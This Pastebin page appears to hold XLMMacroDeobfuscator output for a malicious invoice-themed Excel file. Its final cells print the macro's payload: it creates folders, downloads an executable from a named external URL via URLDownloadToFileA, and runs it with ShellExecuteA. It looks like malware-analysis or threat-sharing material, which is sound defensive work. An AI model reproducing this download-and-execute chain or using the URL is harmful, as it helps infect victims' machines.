Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\infoinvoice_865092.xls\infoinvoice_865092.xlsm
- [Loading Cells]
- auto_open: auto_openypcgg->wshCsjwHppdPqNZn!$GP$756
- [Starting Deobfuscation]
- CELL:GP756 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BT520)
- CELL:BT520 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GC64)
- CELL:GC64 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FS971)
- CELL:FS971 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD1775)
- CELL:BD1775 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IG1897)
- CELL:IG1897 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW548)
- CELL:HW548 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EN777)
- CELL:EN777 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DV981)
- CELL:DV981 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HV1440)
- CELL:HV1440 , FullEvaluation , RUN(wshCsjwHppdPqNZn!T868)
- CELL:T868 , FullEvaluation , RUN(wshCsjwHppdPqNZn!V208)
- CELL:V208 , FullEvaluation , RUN(wshCsjwHppdPqNZn!L526)
- CELL:L526 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CJ963)
- CELL:CJ963 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FE1891)
- CELL:FE1891 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HQ886)
- CELL:HQ886 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EE1823)
- CELL:EE1823 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CY1593)
- CELL:CY1593 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HL781)
- CELL:HL781 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FO617)
- CELL:FO617 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DL1624)
- CELL:DL1624 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DU1273)
- CELL:DU1273 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IJ745)
- CELL:IJ745 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CB1708)
- CELL:CB1708 , FullEvaluation , RUN(wshCsjwHppdPqNZn!Q480)
- CELL:Q480 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CU1272)
- CELL:CU1272 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FO259)
- CELL:FO259 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EX1078)
- CELL:EX1078 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FX1220)
- CELL:FX1220 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EO79)
- CELL:EO79 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AX12)
- CELL:AX12 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AF1326)
- CELL:AF1326 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AA114)
- CELL:AA114 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AK307)
- CELL:AK307 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CH1827)
- CELL:CH1827 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CT1937)
- CELL:CT1937 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EI965)
- CELL:EI965 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW1333)
- CELL:HW1333 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HE1376)
- CELL:HE1376 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GQ1438)
- CELL:GQ1438 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW56)
- CELL:HW56 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD367)
- CELL:BD367 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EE1786)
- CELL:EE1786 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HE1602)
- CELL:HE1602 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DI1984)
- CELL:DI1984 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HR1943)
- CELL:HR1943 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AM1075)
- CELL:AM1075 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BM1289)
- CELL:BM1289 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD1485)
- CELL:BD1485 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HP1465)
- CELL:HP1465 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DB1717)
- CELL:DB1717 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EQ1322)
- CELL:EQ1322 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AZ1191)
- CELL:AZ1191 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AK500)
- CELL:AK500 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HM1754)
- CELL:HM1754 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BO420)
- CELL:BO420 , FullEvaluation , RUN(wshCsjwHppdPqNZn!C387)
- CELL:C387 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CG1648)
- CELL:CG1648 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CV1)
- CELL:CV1 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CQ886)
- CELL:CQ886 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CJ10)
- CELL:CJ10 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CA140)
- CELL:CA140 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BR215)
- CELL:BR215 , FullEvaluation , RUN(wshCsjwHppdPqNZn!Z1977)
- CELL:Z1977 , FullEvaluation , RUN(wshCsjwHppdPqNZn!K1522)
- CELL:K1522 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FY283)
- CELL:FY283 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DW1579)
- CELL:DW1579 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GV611)
- CELL:GV611 , FullEvaluation , RUN(wshCsjwHppdPqNZn!II1071)
- CELL:II1071 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IK335)
- CELL:IK335 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EM1429)
- CELL:EM1429 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1822)
- CELL:HT1822 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IN226)
- CELL:IN227 , FullEvaluation , RUN(wshCsjwHppdPqNZn!R1386)
- CELL:R1386 , FullEvaluation , FORMULA("https://theartistry.co/opengate/readme.php",$BB$54)
- CELL:R1387 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BS1705)
- CELL:BS1706 , FullEvaluation , RUN(wshCsjwHppdPqNZn!X1283)
- CELL:X1283 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT\OJxSJzN.exe",$FV$10)
- CELL:X1284 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GD419)
- CELL:GD420 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BG360)
- CELL:BG360 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT\OJxSJzN.exe",$DO$1389)
- CELL:BG361 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DN1014)
- CELL:DN1015 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AV667)
- CELL:AV667 , FullEvaluation , FORMULA("URLMON",$FG$502)
- CELL:AV668 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EP1493)
- CELL:EP1494 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FL1071)
- CELL:FL1071 , FullEvaluation , FORMULA("URLDownloadToFileA",$GZ$1642)
- CELL:FL1072 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GF1117)
- CELL:GF1118 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GJ727)
- CELL:GJ727 , FullEvaluation , FORMULA("JJCCJJ",$FQ$216)
- CELL:GJ728 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HU1332)
- CELL:HU1333 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BZ651)
- CELL:BZ651 , FullEvaluation , FORMULA("Shell32",$AF$553)
- CELL:BZ652 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GG313)
- CELL:GG314 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AW466)
- CELL:AW466 , FullEvaluation , FORMULA("ShellExecuteA",$IO$1263)
- CELL:AW467 , FullEvaluation , RUN(wshCsjwHppdPqNZn!W991)
- CELL:W992 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CU864)
- CELL:CU864 , FullEvaluation , FORMULA("JJCCCCJ",$FU$70)
- CELL:CU865 , FullEvaluation , RUN(wshCsjwHppdPqNZn!ES194)
- CELL:ES195 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AY736)
- CELL:AY736 , FullEvaluation , FORMULA("Open",$GO$1633)
- CELL:AY737 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HB625)
- CELL:HB626 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CE241)
- CELL:CE241 , FullEvaluation , FORMULA("regsvr32.exe",$F$470)
- CELL:CE242 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DH1652)
- CELL:DH1653 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AM496)
- CELL:AM496 , FullEvaluation , FORMULA("rundll32.exe",$FT$1531)
- CELL:AM497 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EW329)
- CELL:EW330 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IO305)
- CELL:IO305 , FullEvaluation , FORMULA("C:\YHGtfHd",$AK$1197)
- CELL:IO306 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1875)
- CELL:HT1876 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AO672)
- CELL:AO672 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT",$AB$1242)
- CELL:AO673 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FC1296)
- CELL:FC1297 , FullEvaluation , RUN(wshCsjwHppdPqNZn!O536)
- CELL:O536 , FullEvaluation , FORMULA("Kernel32",$GA$40)
- CELL:O537 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HN1652)
- CELL:HN1653 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AX1977)
- CELL:AX1977 , FullEvaluation , FORMULA("CreateDirectoryA",$FY$218)
- CELL:AX1978 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DM1240)
- CELL:DM1241 , FullEvaluation , RUN(wshCsjwHppdPqNZn!A1442)
- CELL:A1442 , FullEvaluation , FORMULA("JCJ",$BS$1104)
- CELL:A1443 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1823)
- CELL:HT1823 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\YHGtfHd",0)
- CELL:HT1824 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\YHGtfHd\pElDosT",0)
- CELL:HT1826 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://theartistry.co/opengate/readme.php","C:\YHGtfHd\pElDosT\OJxSJzN.exe",0,0)
- CELL:HT1827 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\YHGtfHd\pElDosT\OJxSJzN.exe",,0,0)
- CELL:HT1830 , End , HALT()
- [END of Deobfuscation]
- time elapsed: 2.229518175125122
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement